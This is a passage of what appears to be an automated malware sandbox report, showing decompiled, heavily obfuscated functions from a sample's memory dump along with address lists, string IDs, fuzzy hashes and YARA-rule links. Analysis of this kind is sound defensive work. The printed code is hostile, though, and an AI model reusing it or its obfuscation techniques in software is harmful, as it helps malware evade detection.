					E006D422C(_v76,  *((intOrPtr*)(_t241 + 0x28)), _v40);
					_t242 = 0x28cfd81a;
					_t216 = 0x2c1c6573;
					_t237 = 0xdd7d922;
					goto L17;
				}
			}













































                                          0x006d26f5
                                          0x006d26f8
                                          0x006d2700
                                          0x006d270c
                                          0x006d270e
                                          0x006d2710
                                          0x006d2716
                                          0x006d271e
                                          0x006d2720
                                          0x006d2728
                                          0x006d272d
                                          0x006d2735
                                          0x006d2743
                                          0x006d2748
                                          0x006d274e
                                          0x006d2756
                                          0x006d2763
                                          0x006d2764
                                          0x006d2768
                                          0x006d2770
                                          0x006d2778
                                          0x006d2780
                                          0x006d2788
                                          0x006d278d
                                          0x006d2795
                                          0x006d279d
                                          0x006d27a5
                                          0x006d27ad
                                          0x006d27b5
                                          0x006d27c2
                                          0x006d27c6
                                          0x006d27ce
                                          0x006d27db
                                          0x006d27df
                                          0x006d27e7
                                          0x006d27ef
                                          0x006d27f7
                                          0x006d27ff
                                          0x006d2807
                                          0x006d280f
                                          0x006d2817
                                          0x006d2824
                                          0x006d2828
                                          0x006d2830
                                          0x006d2838
                                          0x006d2846
                                          0x006d284a
                                          0x006d2852
                                          0x006d285a
                                          0x006d2862
                                          0x006d286a
                                          0x006d2872
                                          0x006d287a
                                          0x006d2882
                                          0x006d288a
                                          0x006d2897
                                          0x006d289b
                                          0x006d28a3
                                          0x006d28ab
                                          0x006d28b3
                                          0x006d28bb
                                          0x006d28c0
                                          0x006d28c8
                                          0x006d28d0
                                          0x006d28e0
                                          0x006d28e5
                                          0x006d28ef
                                          0x006d28f2
                                          0x006d28f7
                                          0x006d28fb
                                          0x006d2903
                                          0x006d290b
                                          0x006d2913
                                          0x006d2918
                                          0x006d291d
                                          0x006d2925
                                          0x006d292d
                                          0x006d2935
                                          0x006d2939
                                          0x006d2941
                                          0x006d2949
                                          0x006d2951
                                          0x006d2959
                                          0x006d2961
                                          0x006d2966
                                          0x006d296e
                                          0x006d2976
                                          0x006d297e
                                          0x006d2988
                                          0x006d298c
                                          0x006d2994
                                          0x006d2994
                                          0x006d2999
                                          0x006d299e
                                          0x006d29ac
                                          0x006d2a76
                                          0x006d2a93
                                          0x006d2a98
                                          0x006d2a9b
                                          0x006d2a9e
                                          0x006d2aa5
                                          0x006d2aaf
                                          0x006d2a3e
                                          0x006d2a3e
                                          0x00000000
                                          0x006d2a3e
                                          0x006d29b8
                                          0x006d2a48
                                          0x006d2a5a
                                          0x006d2a5f
                                          0x006d2a62
                                          0x006d2a65
                                          0x006d2a6c
                                          0x006d2a71
                                          0x006d2a39
                                          0x006d2a39
                                          0x00000000
                                          0x006d2a39
                                          0x006d29c4
                                          0x00000000
                                          0x006d2b0d
                                          0x006d29cc
                                          0x006d2ae7
                                          0x006d2aea
                                          0x006d2aef
                                          0x006d2af2
                                          0x00000000
                                          0x006d2af2
                                          0x006d29d8
                                          0x006d29dc
                                          0x006d2ad9
                                          0x006d2ad9
                                          0x006d2adf
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x006d29e2
                                          0x006d29f1
                                          0x006d29f6
                                          0x006d29f9
                                          0x006d2a03
                                          0x006d2a08
                                          0x00000000
                                          0x006d2a08
                                          0x006d29dc
                                          0x006d2a19
                                          0x006d2a1a
                                          0x006d2a1d
                                          0x006d2a1e
                                          0x006d2a23
                                          0x006d2a27
                                          0x006d2a29
                                          0x006d2a2f
                                          0x006d2a34
                                          0x00000000
                                          0x006d2a34
                                          0x006d2b15
                                          0x00000000
                                          0x006d2b15
                                          0x006d2abf
                                          0x006d2ac5
                                          0x006d2acf
                                          0x006d2ad4
                                          0x00000000
                                          0x006d2ad4

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: .$4$6x$XLq$e)$}:{$!$*$*
                                          • API String ID: 0-323616845
                                          • Opcode ID: 6dc6bdc14fd99ec38e3d6b927cae69fba899d704fb87829e3752f92676f3624b
                                          • Instruction ID: aef718989276987c902b9afc98ffac97f3519551e49f953d980cb2c179572ec7
                                          • Opcode Fuzzy Hash: 6dc6bdc14fd99ec38e3d6b927cae69fba899d704fb87829e3752f92676f3624b
                                          • Instruction Fuzzy Hash: B6A153719083429FD368CF25C88950BFBE2FBD4754F104A1EF1999A260D3B5CA49CF46
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D63C1, Relevance: 11.4, Strings: 9, Instructions: 194COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E006D63C1() {
				intOrPtr _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _t166;
				signed int _t167;
				signed int _t168;
				void* _t173;
				void* _t191;
				intOrPtr _t196;
				signed int _t197;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t201;
				intOrPtr _t202;
				intOrPtr* _t203;
				signed int _t204;
				signed int* _t205;

				_t205 =  &_v76;
				_v8 = 0x6b5f41;
				_t196 = 0;
				_t173 = 0x1e312b00;
				_v4 = 0;
				_v40 = 0xbf50;
				_v40 = _v40 + 0xffff4d7d;
				_v40 = _v40 ^ 0x1ff0eb0a;
				_v40 = _v40 ^ 0x1ff1e7c7;
				_v68 = 0xcba5;
				_v68 = _v68 + 0xffffed4d;
				_v68 = _v68 >> 9;
				_v68 = _v68 | 0x05a9bf19;
				_v68 = _v68 ^ 0x05a9faf6;
				_v52 = 0xab70;
				_v52 = _v52 + 0xffff3c3f;
				_v52 = _v52 ^ 0x3be47de3;
				_v52 = _v52 ^ 0xc41b8c81;
				_v20 = 0x4c56;
				_t27 =  &_v20; // 0x4c56
				_t197 = 0x53;
				_v20 =  *_t27 / _t197;
				_v20 = _v20 ^ 0x00006ba4;
				_v44 = 0x4e4f;
				_v44 = _v44 + 0xffff1389;
				_v44 = _v44 ^ 0x6e1bb2f9;
				_v44 = _v44 ^ 0x91e4a702;
				_v48 = 0x9b6d;
				_t198 = 0x15;
				_v48 = _v48 / _t198;
				_v48 = _v48 << 0xe;
				_v48 = _v48 ^ 0x01d9d03e;
				_v16 = 0x7c52;
				_t199 = 0x3a;
				_v16 = _v16 * 0x14;
				_v16 = _v16 ^ 0x0009e5e2;
				_v64 = 0x462a;
				_v64 = _v64 ^ 0x0e1a4a8f;
				_v64 = _v64 >> 3;
				_v64 = _v64 >> 0xc;
				_v64 = _v64 ^ 0x000014fb;
				_v72 = 0x5cc4;
				_v72 = _v72 / _t199;
				_v72 = _v72 + 0x2f24;
				_v72 = _v72 + 0xd2bc;
				_v72 = _v72 ^ 0x000179b4;
				_v24 = 0x30ff;
				_t200 = 0x2a;
				_v24 = _v24 / _t200;
				_v24 = _v24 ^ 0x00007cf0;
				_v28 = 0x85cd;
				_v28 = _v28 ^ 0xf8a4d4b8;
				_v28 = _v28 ^ 0xf8a43927;
				_v76 = 0x1878;
				_v76 = _v76 ^ 0x7099aca3;
				_v76 = _v76 ^ 0x4acb853d;
				_v76 = _v76 + 0xffff4ab7;
				_v76 = _v76 ^ 0x3a511503;
				_v32 = 0x1800;
				_v32 = _v32 << 1;
				_v32 = _v32 ^ 0x00002132;
				_v60 = 0xa25b;
				_v60 = _v60 * 0x67;
				_v60 = _v60 + 0x9ac4;
				_v60 = _v60 ^ 0x004180d5;
				_v36 = 0x47a4;
				_v36 = _v36 << 9;
				_v36 = _v36 ^ 0xcd228633;
				_v36 = _v36 ^ 0xcdadbf4b;
				_v12 = 0xe30d;
				_v12 = _v12 << 8;
				_v12 = _v12 ^ 0x00e3661f;
				_t172 = _v12;
				_t204 = _v12;
				_t201 = _v12;
				_v56 = 0x2740;
				_v56 = _v56 ^ 0x239771de;
				_v56 = _v56 + 0xfffffe7e;
				_v56 = _v56 ^ 0x23985523;
				while(1) {
					L1:
					_t191 = 0x5c;
					while(1) {
						L2:
						do {
							L3:
							while(_t173 != 0x3fc1d7) {
								if(_t173 == 0x353ab5a) {
									_t202 =  *0x6dca2c; // 0x248300
									_t203 = _t202 + 0x230;
									while( *_t203 != _t191) {
										_t203 = _t203 + 2;
									}
									_t201 = _t203 + 2;
									_t173 = 0x6fcf9e2;
									goto L2;
								} else {
									if(_t173 == 0x6adc8a5) {
										_t167 = E006CF65F(_v40, _v44, _v48, _v16, _t201, _t172, _v64);
										_t205 =  &(_t205[5]);
										_t204 = _t167;
										_t166 = 0xd265085;
										_t173 =  !=  ? 0xd265085 : 0x3fc1d7;
										_t191 = 0x5c;
										continue;
									} else {
										if(_t173 == 0x6fcf9e2) {
											_t168 = E006C2959(_t173, _v68, _v52, _v20, _v56);
											_t172 = _t168;
											_t205 =  &(_t205[4]);
											if(_t168 != 0) {
												_t173 = 0x6adc8a5;
												goto L1;
											}
										} else {
											if(_t173 == _t166) {
												E006D507B(_v72, _v24, _v28, _v76, _t204);
												_t205 =  &(_t205[3]);
												_t196 =  !=  ? 1 : _t196;
												_t173 = 0x17a504e8;
												while(1) {
													L1:
													_t191 = 0x5c;
													goto L2;
												}
											} else {
												if(_t173 == 0x17a504e8) {
													E006C5FB2(_v32, _v60, _t204);
													_t173 = 0x3fc1d7;
													while(1) {
														L1:
														_t191 = 0x5c;
														L2:
														goto L3;
													}
												} else {
													if(_t173 != 0x1e312b00) {
														goto L21;
													} else {
														_t173 = 0x353ab5a;
														continue;
													}
												}
											}
										}
									}
								}
								goto L22;
							}
							E006C5FB2(_v36, _v12, _t172);
							_t173 = 0x26181ebc;
							_t166 = 0xd265085;
							_t191 = 0x5c;
							L21:
						} while (_t173 != 0x26181ebc);
						L22:
						return _t196;
					}
				}
			}





































                                          0x006d63c1
                                          0x006d63c4
                                          0x006d63d2
                                          0x006d63d4
                                          0x006d63d9
                                          0x006d63dd
                                          0x006d63e5
                                          0x006d63ed
                                          0x006d63f5
                                          0x006d63fd
                                          0x006d6405
                                          0x006d640d
                                          0x006d6412
                                          0x006d641a
                                          0x006d6422
                                          0x006d642a
                                          0x006d6432
                                          0x006d643a
                                          0x006d6442
                                          0x006d644a
                                          0x006d6450
                                          0x006d6455
                                          0x006d645b
                                          0x006d6463
                                          0x006d646b
                                          0x006d6473
                                          0x006d647b
                                          0x006d6483
                                          0x006d648f
                                          0x006d6494
                                          0x006d649a
                                          0x006d649f
                                          0x006d64a7
                                          0x006d64b4
                                          0x006d64b7
                                          0x006d64bb
                                          0x006d64c3
                                          0x006d64cb
                                          0x006d64d3
                                          0x006d64d8
                                          0x006d64dd
                                          0x006d64e5
                                          0x006d64f5
                                          0x006d64f9
                                          0x006d6501
                                          0x006d6509
                                          0x006d6511
                                          0x006d651d
                                          0x006d6520
                                          0x006d6524
                                          0x006d652c
                                          0x006d6534
                                          0x006d653c
                                          0x006d6544
                                          0x006d654c
                                          0x006d6554
                                          0x006d655c
                                          0x006d6564
                                          0x006d656c
                                          0x006d6574
                                          0x006d6578
                                          0x006d6580
                                          0x006d658d
                                          0x006d6591
                                          0x006d6599
                                          0x006d65a1
                                          0x006d65a9
                                          0x006d65ae
                                          0x006d65b6
                                          0x006d65be
                                          0x006d65c6
                                          0x006d65cb
                                          0x006d65d3
                                          0x006d65d7
                                          0x006d65db
                                          0x006d65df
                                          0x006d65e7
                                          0x006d65ef
                                          0x006d65f7
                                          0x006d65ff
                                          0x006d65ff
                                          0x006d6601
                                          0x006d6602
                                          0x006d6602
                                          0x006d6607
                                          0x00000000
                                          0x006d6607
                                          0x006d6619
                                          0x006d66f6
                                          0x006d66fc
                                          0x006d6707
                                          0x006d6704
                                          0x006d6704
                                          0x006d670c
                                          0x006d670f
                                          0x00000000
                                          0x006d661f
                                          0x006d6625
                                          0x006d66d5
                                          0x006d66da
                                          0x006d66dd
                                          0x006d66e6
                                          0x006d66eb
                                          0x006d66f0
                                          0x00000000
                                          0x006d662b
                                          0x006d6631
                                          0x006d66a3
                                          0x006d66a8
                                          0x006d66aa
                                          0x006d66af
                                          0x006d66b5
                                          0x00000000
                                          0x006d66b5
                                          0x006d6633
                                          0x006d6635
                                          0x006d6679
                                          0x006d6680
                                          0x006d6686
                                          0x006d6689
                                          0x006d65ff
                                          0x006d65ff
                                          0x006d6601
                                          0x00000000
                                          0x006d6601
                                          0x006d6637
                                          0x006d663d
                                          0x006d665b
                                          0x006d6661
                                          0x006d65ff
                                          0x006d65ff
                                          0x006d6601
                                          0x006d6602
                                          0x00000000
                                          0x006d6602
                                          0x006d663f
                                          0x006d6645
                                          0x00000000
                                          0x006d664b
                                          0x006d664b
                                          0x00000000
                                          0x006d664b
                                          0x006d6645
                                          0x006d663d
                                          0x006d6635
                                          0x006d6631
                                          0x006d6625
                                          0x00000000
                                          0x006d6619
                                          0x006d6722
                                          0x006d672a
                                          0x006d672f
                                          0x006d6734
                                          0x006d6735
                                          0x006d6735
                                          0x006d6741
                                          0x006d674a
                                          0x006d674a
                                          0x006d6602

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: $/$*F$2!$@'$A_k$ON$R|$VLA_k$};
                                          • API String ID: 0-175875280
                                          • Opcode ID: 0c4f5b7f6969663be1f2afb8e548c8e6ae8d311b9b32f3d68a4793773c2d4130
                                          • Instruction ID: 830fd4ff3c170bceed103b41e870b9a2d95b0990d8b200e38249213d9a3a410c
                                          • Opcode Fuzzy Hash: 0c4f5b7f6969663be1f2afb8e548c8e6ae8d311b9b32f3d68a4793773c2d4130
                                          • Instruction Fuzzy Hash: 4E8176715083809BD798CF25C49A82FBBF2FBC4358F504A1DF686462A0C7B5CA49CB87
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D2349, Relevance: 11.4, Strings: 9, Instructions: 190COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E006D2349(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t153;
				void* _t168;
				signed int _t172;
				char _t177;
				signed int _t178;
				void* _t181;
				char* _t186;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				signed int* _t214;

				_push(_a16);
				_push(0x40);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006C602B(_t153);
				_v20 = 0x10;
				_t214 =  &(( &_v80)[6]);
				_v60 = 0xafa2;
				_v60 = _v60 ^ 0xad7cd4b0;
				_t178 = 0;
				_v60 = _v60 | 0x7a339cd1;
				_t181 = 0x15b39dc0;
				_v60 = _v60 ^ 0xff7ff485;
				_v64 = 0xe220;
				_v64 = _v64 >> 2;
				_v64 = _v64 | 0x618d1066;
				_v64 = _v64 ^ 0x618d4123;
				_v28 = 0xfe94;
				_t206 = 0x17;
				_v28 = _v28 / _t206;
				_v28 = _v28 ^ 0x000043c3;
				_v32 = 0x6fe3;
				_v32 = _v32 >> 1;
				_v32 = _v32 ^ 0x000078b7;
				_v36 = 0x3688;
				_t207 = 0x69;
				_v36 = _v36 * 0x5a;
				_v36 = _v36 ^ 0x00137d17;
				_v24 = 0x8157;
				_v24 = _v24 | 0x6dbfc3a0;
				_v24 = _v24 ^ 0x6dbfb45a;
				_v80 = 0xe945;
				_v80 = _v80 / _t207;
				_v80 = _v80 ^ 0xcc46d226;
				_t208 = 0x62;
				_v80 = _v80 / _t208;
				_v80 = _v80 ^ 0x0215c355;
				_v48 = 0x42ef;
				_v48 = _v48 + 0xffff3840;
				_v48 = _v48 << 4;
				_v48 = _v48 ^ 0xfff789fd;
				_v72 = 0xbf2b;
				_v72 = _v72 | 0xc326a1c7;
				_t209 = 0x4b;
				_v72 = _v72 / _t209;
				_v72 = _v72 | 0xd12f9700;
				_v72 = _v72 ^ 0xd3bfbe8a;
				_v52 = 0xfa61;
				_v52 = _v52 << 3;
				_v52 = _v52 + 0x5488;
				_v52 = _v52 ^ 0x00084626;
				_v56 = 0xb5dc;
				_v56 = _v56 | 0x6ca6e5ac;
				_v56 = _v56 * 0x5e;
				_v56 = _v56 ^ 0xe54e28a7;
				_v76 = 0xbf9d;
				_v76 = _v76 + 0xdb7b;
				_v76 = _v76 + 0xffff5618;
				_v76 = _v76 | 0xc179f847;
				_v76 = _v76 ^ 0xc1798349;
				_v40 = 0xd8e6;
				_v40 = _v40 + 0x2ceb;
				_v40 = _v40 + 0x406a;
				_v40 = _v40 ^ 0x0001168e;
				_v68 = 0x1b9c;
				_t210 = 0x7a;
				_v68 = _v68 * 0x38;
				_v68 = _v68 + 0xa456;
				_v68 = _v68 >> 0xe;
				_v68 = _v68 ^ 0x00002836;
				_v44 = 0x7a08;
				_v44 = _v44 << 0xd;
				_v44 = _v44 / _t210;
				_v44 = _v44 ^ 0x00205e6a;
				while(_t181 != 0x12ef740) {
					if(_t181 == 0x13e246ff) {
						__eflags = _v16;
						_t186 =  &_v16;
						while(__eflags != 0) {
							_t177 =  *_t186;
							__eflags = _t177 - 0x30;
							if(_t177 < 0x30) {
								L11:
								__eflags = _t177 - 0x61;
								if(_t177 < 0x61) {
									L13:
									__eflags = _t177 - 0x41;
									if(_t177 < 0x41) {
										L15:
										 *_t186 = 0x58;
									} else {
										__eflags = _t177 - 0x5a;
										if(_t177 > 0x5a) {
											goto L15;
										}
									}
								} else {
									__eflags = _t177 - 0x7a;
									if(_t177 > 0x7a) {
										goto L13;
									}
								}
							} else {
								__eflags = _t177 - 0x39;
								if(_t177 > 0x39) {
									goto L11;
								}
							}
							_t186 = _t186 + 1;
							__eflags =  *_t186;
						}
						_t181 = 0x12ef740;
						continue;
					} else {
						if(_t181 == 0x15b39dc0) {
							_t181 = 0x3a71512f;
							continue;
						} else {
							if(_t181 != 0x3a71512f) {
								L19:
								__eflags = _t181 - 0x2b24b5a2;
								if(__eflags != 0) {
									continue;
								}
							} else {
								if(E006C602C(_v60,  &_v16,  &_v20, _v64) != 0) {
									_t181 = 0x13e246ff;
									continue;
								}
							}
						}
					}
					return _t178;
				}
				_push(0x6dc030);
				_push(_v36);
				_t168 = E006D878F(_v28, _v32, __eflags);
				E006D31E2(__eflags);
				_t143 =  &_v56; // 0x205e6a
				_t172 = E006D6A65(_v48, __eflags,  &_v16, _v72, _a16, 0x40, _t168, _v52,  *_t143, _v76);
				__eflags = _t172;
				_t152 = _t172 > 0;
				__eflags = _t152;
				_t178 = 0 | _t152;
				E006D2025(_v40, _t168, _v68, _v44);
				_t214 =  &(_t214[0xc]);
				_t181 = 0x2b24b5a2;
				goto L19;
			}

































                                          0x006d2350
                                          0x006d2354
                                          0x006d2356
                                          0x006d235a
                                          0x006d235e
                                          0x006d235f
                                          0x006d2360
                                          0x006d2365
                                          0x006d236d
                                          0x006d2370
                                          0x006d237a
                                          0x006d2382
                                          0x006d2384
                                          0x006d238c
                                          0x006d2391
                                          0x006d2399
                                          0x006d23a1
                                          0x006d23a6
                                          0x006d23ae
                                          0x006d23b6
                                          0x006d23c4
                                          0x006d23c9
                                          0x006d23cf
                                          0x006d23d7
                                          0x006d23df
                                          0x006d23e3
                                          0x006d23eb
                                          0x006d23f8
                                          0x006d23fb
                                          0x006d23ff
                                          0x006d2407
                                          0x006d240f
                                          0x006d2417
                                          0x006d241f
                                          0x006d242f
                                          0x006d2433
                                          0x006d243f
                                          0x006d2444
                                          0x006d244a
                                          0x006d2452
                                          0x006d245a
                                          0x006d2462
                                          0x006d2467
                                          0x006d246f
                                          0x006d2477
                                          0x006d2483
                                          0x006d2486
                                          0x006d248a
                                          0x006d2492
                                          0x006d249a
                                          0x006d24a2
                                          0x006d24a7
                                          0x006d24af
                                          0x006d24b7
                                          0x006d24bf
                                          0x006d24cc
                                          0x006d24d0
                                          0x006d24d8
                                          0x006d24e0
                                          0x006d24e8
                                          0x006d24f2
                                          0x006d24ff
                                          0x006d250c
                                          0x006d2514
                                          0x006d251c
                                          0x006d2524
                                          0x006d252c
                                          0x006d253b
                                          0x006d253c
                                          0x006d2540
                                          0x006d2548
                                          0x006d254d
                                          0x006d2555
                                          0x006d255d
                                          0x006d2568
                                          0x006d256c
                                          0x006d2574
                                          0x006d257a
                                          0x006d25bb
                                          0x006d25c0
                                          0x006d25c4
                                          0x006d25c6
                                          0x006d25c8
                                          0x006d25ca
                                          0x006d25d0
                                          0x006d25d0
                                          0x006d25d2
                                          0x006d25d8
                                          0x006d25d8
                                          0x006d25da
                                          0x006d25e0
                                          0x006d25e0
                                          0x006d25dc
                                          0x006d25dc
                                          0x006d25de
                                          0x00000000
                                          0x00000000
                                          0x006d25de
                                          0x006d25d4
                                          0x006d25d4
                                          0x006d25d6
                                          0x00000000
                                          0x00000000
                                          0x006d25d6
                                          0x006d25cc
                                          0x006d25cc
                                          0x006d25ce
                                          0x00000000
                                          0x00000000
                                          0x006d25ce
                                          0x006d25e3
                                          0x006d25e4
                                          0x006d25e4
                                          0x006d25e9
                                          0x00000000
                                          0x006d257c
                                          0x006d2582
                                          0x006d25b4
                                          0x00000000
                                          0x006d2584
                                          0x006d258a
                                          0x006d265e
                                          0x006d265e
                                          0x006d2664
                                          0x00000000
                                          0x00000000
                                          0x006d2590
                                          0x006d25aa
                                          0x006d25b0
                                          0x00000000
                                          0x006d25b0
                                          0x006d25aa
                                          0x006d258a
                                          0x006d2582
                                          0x006d2673
                                          0x006d2673
                                          0x006d25ed
                                          0x006d25f2
                                          0x006d25fe
                                          0x006d260d
                                          0x006d261a
                                          0x006d2637
                                          0x006d264c
                                          0x006d264e
                                          0x006d264e
                                          0x006d264e
                                          0x006d2651
                                          0x006d2656
                                          0x006d2659
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: $/Qq:$/Qq:$6($E$j@$j^ $j^ $o
                                          • API String ID: 0-892457230
                                          • Opcode ID: 9daf9bc43cce3806ffad4262b8ad2d2643755621c33937d6d693b273a14329ad
                                          • Instruction ID: 1c526b9858b783da849466794dfa5e92677b13e93efd3ca61db67eb1156139b2
                                          • Opcode Fuzzy Hash: 9daf9bc43cce3806ffad4262b8ad2d2643755621c33937d6d693b273a14329ad
                                          • Instruction Fuzzy Hash: 278199719093429FD758CF25D99695FBBE2BBC0B18F40490EF181962A0D7B5C90ACF47
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10002D70, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108commemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SysAllocString.OLEAUT32(<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:output method="text" version="1.0" encoding="), ref: 10002D7F
                                          • CoCreateInstance.OLE32(1000D4B0,00000000,00000001,1000D4C0,?), ref: 10002DB0
                                          • PropVariantClear.OLE32(?), ref: 10002E75
                                          • SysFreeString.OLEAUT32(00000000), ref: 10002E7E
                                          • SysFreeString.OLEAUT32(00000000), ref: 10002E97
                                          Strings
                                          • <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:output method="text" version="1.0" encoding=", xrefs: 10002D77
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: String$Free$AllocClearCreateInstancePropVariant
                                          • String ID: <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:output method="text" version="1.0" encoding="
                                          • API String ID: 2501108336-1018649646
                                          • Opcode ID: 96621fcdecdd77bcd87e053180f01b167328e1e2a90fb6c4d0d6cfded311a5a7
                                          • Instruction ID: 0b0c17a62beb8f9cda8331f18031103c31f3880d59fc8f905040adcea8ba8702
                                          • Opcode Fuzzy Hash: 96621fcdecdd77bcd87e053180f01b167328e1e2a90fb6c4d0d6cfded311a5a7
                                          • Instruction Fuzzy Hash: D5417071D0022AAFDB00DBA4CC48ADEB7B8EF48754F114199F905EB254DB71DE01CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D9B45, Relevance: 10.3, Strings: 8, Instructions: 294COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E006D9B45(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				signed int* _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				unsigned int _v112;
				signed int _v116;
				void* _t241;
				intOrPtr _t259;
				void* _t260;
				intOrPtr _t268;
				intOrPtr _t269;
				intOrPtr _t270;
				intOrPtr _t274;
				intOrPtr* _t281;
				signed int _t283;
				void* _t315;
				intOrPtr* _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int* _t322;
				signed int* _t325;
				void* _t327;

				_t281 = _a8;
				_push(_t281);
				_push(_a4);
				_t316 = __ecx;
				_push(__edx);
				_push(__ecx);
				E006C602B(_t241);
				_v76 = 0xd801;
				_t325 =  &(( &_v116)[4]);
				_v76 = _v76 >> 6;
				_t315 = 0;
				_t283 = 0xafaf7d2;
				_t317 = 6;
				_v76 = _v76 * 0x2a;
				_v76 = _v76 ^ 0x0000b202;
				_v80 = 0xa1a8;
				_v80 = _v80 | 0xe917477a;
				_v80 = _v80 << 2;
				_v80 = _v80 ^ 0xa45f8c0e;
				_v84 = 0x144b;
				_v84 = _v84 + 0xffffbc75;
				_v84 = _v84 * 0x6d;
				_v84 = _v84 ^ 0xffeb93ca;
				_v52 = 0x2e4b;
				_v52 = _v52 | 0x557249c0;
				_v52 = _v52 ^ 0x346b51fe;
				_v52 = _v52 ^ 0x611902e1;
				_v56 = 0xfad0;
				_v56 = _v56 + 0xffff1342;
				_v56 = _v56 ^ 0x8fd20197;
				_v56 = _v56 ^ 0x8fd21d65;
				_v96 = 0x8e39;
				_v96 = _v96 + 0xd833;
				_v96 = _v96 + 0xffffc0bd;
				_v96 = _v96 >> 0xa;
				_v96 = _v96 ^ 0x000036ba;
				_v12 = 0xb209;
				_v12 = _v12 ^ 0xf6f529e5;
				_v12 = _v12 ^ 0xf6f5ec43;
				_v64 = 0xc247;
				_v64 = _v64 + 0xffff53d4;
				_v64 = _v64 << 9;
				_v64 = _v64 ^ 0x002c2f20;
				_v100 = 0x41c0;
				_v100 = _v100 | 0x528356d8;
				_v100 = _v100 ^ 0x6d95e5a5;
				_v100 = _v100 >> 1;
				_v100 = _v100 ^ 0x1f8b2fe0;
				_v16 = 0x904b;
				_v16 = _v16 + 0x3d62;
				_v16 = _v16 ^ 0x0000a85c;
				_v68 = 0xf7e0;
				_v68 = _v68 | 0xcc3d0ce1;
				_v68 = _v68 >> 7;
				_v68 = _v68 ^ 0x01982b66;
				_v72 = 0x69a0;
				_v72 = _v72 / _t317;
				_v72 = _v72 ^ 0xd5ac5c66;
				_v72 = _v72 ^ 0xd5ac219b;
				_v20 = 0x9739;
				_v20 = _v20 << 2;
				_v20 = _v20 ^ 0x000260e8;
				_v24 = 0xc564;
				_t318 = 0x2c;
				_v24 = _v24 / _t318;
				_v24 = _v24 ^ 0x00005d30;
				_v88 = 0xe78a;
				_v88 = _v88 >> 1;
				_v88 = _v88 << 4;
				_v88 = _v88 ^ 0x00070feb;
				_v28 = 0x7421;
				_v28 = _v28 + 0xffff545c;
				_v28 = _v28 ^ 0xfffff127;
				_v32 = 0x3ef3;
				_t319 = 0x23;
				_v32 = _v32 * 0x1e;
				_v32 = _v32 ^ 0x00070388;
				_v36 = 0x1f6a;
				_v36 = _v36 << 0xa;
				_v36 = _v36 ^ 0x007d8833;
				_v104 = 0xc791;
				_v104 = _v104 + 0xffffa2ac;
